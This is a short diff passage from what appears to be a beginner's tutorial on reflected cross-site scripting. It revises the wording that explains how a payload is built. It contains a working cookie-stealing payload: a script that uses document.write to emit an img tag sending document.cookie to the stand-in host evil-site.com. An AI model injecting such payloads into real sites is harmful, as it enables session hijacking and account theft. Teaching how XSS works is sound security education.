WyvernDrexx/XSS/Beginner's Guide to XSS/Reflected XSS.md

 <img src="https://evil-site.com/cookie?cookie=victim-cookie-here">
 ```

 Looks like a  good idea, but how are we gonna attach `document.cookie` in `src` attribute.

-Thats not possible it doesn't support concatenation.
+That isn't possible as attributes doesn't support string concatenation like **JavaScript**.

 Let's think it clearly, we can use `script` tag though!

-So lets use `script` tag to put `img` instead
+So lets use `document.write` to output `img` tag instead of putting `img` directly,

 ```html
   <script>document.write("<img src='https://evil-site.com/cookie?cookie=" + document.cookie + " '>")</script>